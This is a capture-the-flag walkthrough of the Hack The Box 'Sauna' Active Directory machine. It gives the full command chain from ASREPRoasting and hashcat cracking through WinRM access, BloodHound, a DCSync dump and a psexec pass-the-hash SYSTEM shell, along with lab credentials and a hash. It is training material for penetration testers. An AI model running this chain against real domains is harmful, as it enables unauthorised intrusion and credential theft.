Enumeration
Nmap - Discovering Open Ports
We start with an aggressive port scan to find all open TCP ports, followed by a more detailed scan of those ports to identify running services and versions.
ports=$(nmap -p- --min-rate=1000 -T4 10.129.95.180 | grep ^[0-9] | cut -d '/' -f 1 | tr '\n' ',' | sed s/,$//)
nmap -p$ports -sC -sV 10.129.95.180
From the results, we learn that this machine is part of a Windows domain called egotistical-bank.local. Key services running include:
- IIS (web server) on port 80
- LDAP (directory service) on port 389
These are worth exploring further.
LDAP - Active Directory Enumeration
LDAP (Lightweight Directory Access Protocol) is used in Windows environments to manage users, groups, and more. We use windapsearch to search for domain info:
./windapsearch.py -d egotistical-bank.local --dc-ip 10.129.95.180 -U
It connects anonymously (no login required), but doesn’t return any useful results.
We also try Impacket’s GetADUsers.py, which queries Active Directory for user info:
GetADUsers.py egotistical-bank.local/ -dc-ip 10.129.95.180 -debug
Again, nothing useful is returned. Time to move on.
SMB - File Share Enumeration
We try accessing shared folders using smbclient:
smbclient -L \\\\10.129.95.180 -N
Anonymous access works, but no shares are listed. On to the next vector.
Web - Exploring the Website
Visiting http://10.129.95.180 shows a banking-themed website. Wappalyzer doesn’t flag any vulnerable tech.
We try directory brute-forcing:
ffuf -w /usr/share/wordlists/dirb/common.txt -u http://10.129.95.180/FUZZ
The results are unremarkable until we view about.html which contains full names of staff, which could help generate usernames.
Foothold
Username Generation
We can use the tool called Username Anarchy to create username formats from the list of employee names:
./username-anarchy --input-file fullnames.txt --select-format first,flast,first.last,firstl > unames.txt
ASREPRoasting - No Pre-Auth Kerberos Attack
In Active Directory, Kerberos pre-authentication is a security check that stops attackers from asking for encrypted data without proving who they are.
If it is turned off for an account, we can request a TGT (Ticket Granting Ticket) and extract a hash to crack offline.
This technique is called ASREPRoasting. We use Impacket's GetNPUsers.py to test usernames:
while read p; do GetNPUsers.py egotistical-bank.local/"$p" -request -no-pass -dc-ip 10.129.95.180 >> hash.txt; done < unames.txt
We get a hash for user fsmith.
Cracking the Hash with Hashcat
Let’s try cracking this hash using hashcat. First, confirm the mode for Kerberos AS-REP:
hashcat --help | grep Kerberos
Mode 18200 is what we need. Run:
hashcat -m 18200 hash.txt -o pass.txt /usr/share/wordlists/rockyou.txt --force
Eventually, the password is found: Thestrokes23.
WinRM - Remote Access as fsmith
Now we have credentials! We use evil-winrm to connect via WinRM (Windows Remote Management):
evil-winrm -i 10.129.95.180 -u fmith -p 'Thestrokes23'Once connected, we grab the user flag from:
C:\Users\Fsmith\Desktop\user.txt
Privilege Escalation
WinPEAS - Finding PrivEsc Vectors
We run WinPEAS.exe (a privilege escalation enumeration script). Upload it via evil-winrm and execute.
It finds that user svc_loanmanager has auto-logon enabled, and reveals the password:
Moneymakestheworldgoround!
Examination of C:\Users\ confirms that the similarly named svc_loanmgr has logged on locally.
We confirm that this account exists and is part of the Remote Management Users group:
net user svc_loanmgr
Now log in with the new credentials:
evil-winrm -i 10.129.95.180 -u svc_loanmgr -p 'Moneymakestheworldgoround!'
Bloodhound - AD Attack Path Mapping
BloodHound helps us find privilege escalation paths in Active Directory.
First, collect data using bloodhound-python:
bloodhound-python -u svc_loanmgr -p 'Moneymakestheworldgoround!' -d EGOTISTICAL-BANK.LOCAL -ns 10.129.95.180 -c All
Zip the collected files:
zip bloodhound.zip *.json
Set up BloodHound Community Edition (see official Kali guide):
sudo bloodhound-setupOpen BloodHound:
Go to http://localhost:7474, login with default creds neo4j:neo4j, then change the password. Update /etc/bhapi/bhapi.json accordingly.
Run BloodHound and import the zip file:
sudo bloodhoundSearch for SVC_LOANMGR and select Outbound Object Control. We note that node SVC_LOANMGR is connected with EGOTISTICAL-BANK.LOCAL node via the GetChangesAll edge.
After clicking on the edge and selecting Linux Abuse, we find that svc_loanmgr has the GetChangesAll privilege on the domain which means it can do a DCSync attack.
DCSync - Dumping Domain Admin Hash
DCSync simulates the behaviour of a Domain Controller to ask for password hashes of other users. Very powerful!
Run the following command:
secretsdump.py egotistical-bank/svc_loanmgr@10.129.95.180 -just-dc-user Administrator
It gives us the NTLM hash of the Administrator account.
SYSTEM Access via Pass-the-Hash
Finally, we use psexec.py with the Administrator’s hash to get SYSTEM shell access:
psexec.py egotistical-bank.local/administrator@10.129.95.180 -hashes :823452073d75b9d1cf70ebdf86c7f98e
The root flag is located here:
C:\Users\Administrator\Desktop\root.txt
References
- HTB’s official writeup for Sauna
- Username Anarchy
- BloodHound Setup Guide